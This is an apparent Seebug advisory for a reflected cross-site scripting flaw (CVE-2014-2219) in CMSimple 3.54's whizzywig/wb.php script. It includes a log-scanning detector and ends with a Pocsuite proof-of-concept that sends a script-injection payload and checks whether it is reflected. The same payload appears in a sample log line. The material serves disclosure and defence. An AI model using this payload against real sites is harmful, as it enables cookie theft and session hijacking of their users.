seebug | Root | SSV:61903
History: Mar 25, 2014 - 12:00 a.m.

CMSimple '/whizzywig/wb.php' Cross-Site Scripting Vulnerability

2014-03-25 00:00:00
Root
www.seebug.org
27

EPSS: 0.003 (Low)
Percentile: 63.7%

Bugtraq ID:66312
CVE ID:CVE-2014-2219

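CMSimple is a simple open-source content management system developed overseas.

CMSimple does not properly filter the data passed in the "d" HTTP GET parameter to the "/whizzywig/wb.php" script. An attacker can construct a malicious URI and lure a user into opening it, which can expose sensitive cookies, hijack the session, or perform malicious actions on the client.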
CMSimple 3.54
Users can refer to the following vendor-provided security patch to fix this vulnerability:
http://sourceforge.net/projects/cmsimple-le/files/cmsimple_classic/
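
Until the patch is applied, attempts against this parameter can be spotted in web server logs. The following is an added example, not part of the original advisory or of CMSimple: it scans access-log lines for requests to "/whizzywig/wb.php" whose "d" parameter contains HTML metacharacters after URL-decoding. The log lines are constructed samples, and the combined log format and the function name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Mar/2014:10:00:01 +0000] "GET /whizzywig/wb.php?d=images HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Mar/2014:10:00:07 +0000] "GET /whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27sebug%27%29%3C/script%3E HTTP/1.1" 200 498 "-" "python-requests"
203.0.113.9 - - [25/Mar/2014:10:00:09 +0000] "GET /index.php?d=%3Cb%3E HTTP/1.1" 200 120 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Mar/2014:10:02:11 +0000] "GET /cms/whizzywig/wb.php?x=1&d=%3Cb%3Etest%3C%2Fb%3E HTTP/1.1" 200 498 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TARGET_SUFFIX = "/whizzywig/wb.php"  # script named in the advisory
MARKUP_CHARS = set("<>\"'")          # characters that can break out of an HTML context


def suspicious_requests(log_text):
    """Return (client_ip, decoded_d_value) for requests to wb.php whose
    'd' parameter contains HTML metacharacters after URL-decoding."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target = m.groups()
        parts = urlsplit(target)
        # Match the script wherever CMSimple is installed (e.g. under /cms/).
        if not parts.path.lower().endswith(TARGET_SUFFIX):
            continue
        # parse_qs percent-decodes each value; a repeated "d" yields several values.
        for value in parse_qs(parts.query, keep_blank_values=True).get("d", []):
            if MARKUP_CHARS & set(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(client, repr(value))
```
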


#!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

class TestPOC(POCBase):
    vulID = 'SSV-61903'  # vul ID
    version = '1'
    author = 'fenghh'
    vulDate = '2014-03-25'
    createDate = '2015-10-14'
    updateDate = '2015-10-14'
    references = ['http://sebug.net/vuldb/ssvid-61903']
    name = 'CMSimple 3.54 /whizzywig/wb.php XSS漏洞'
    appPowerLink = 'www.cmsimple.dk'
    appName = 'cmsimple'
    appVersion = '3.54'
    vulType = 'XSS'
    desc = '''  
        漏洞文件:Getarticle.CMSimple不正确过滤传递给"/whizzywig/wb.php"脚本的"d" HTTP GET参数数据,
        允许攻击者构建恶意URI,诱使用户解析,可获得敏感Cookie,劫持会话或在客户端上进行恶意操作。
    '''
    # sample sites to test against
    samples = ['']

    def _verify(self):
        output = Output(self)
        result = {}
        payload = '/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27sebug%27%29%3C/script%3E'
        verify_url = self.url + payload
        content = req.get(verify_url).content
        # The payload sends alert('sebug') with single quotes, so match that exact reflection.
        if "<script>alert('sebug')</script>" in content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = verify_url
            output.success(result)
        else:
            output.fail('XSS Failed')
        return output

    def _attack(self):   
        return self._verify()

register(TestPOC)
                              
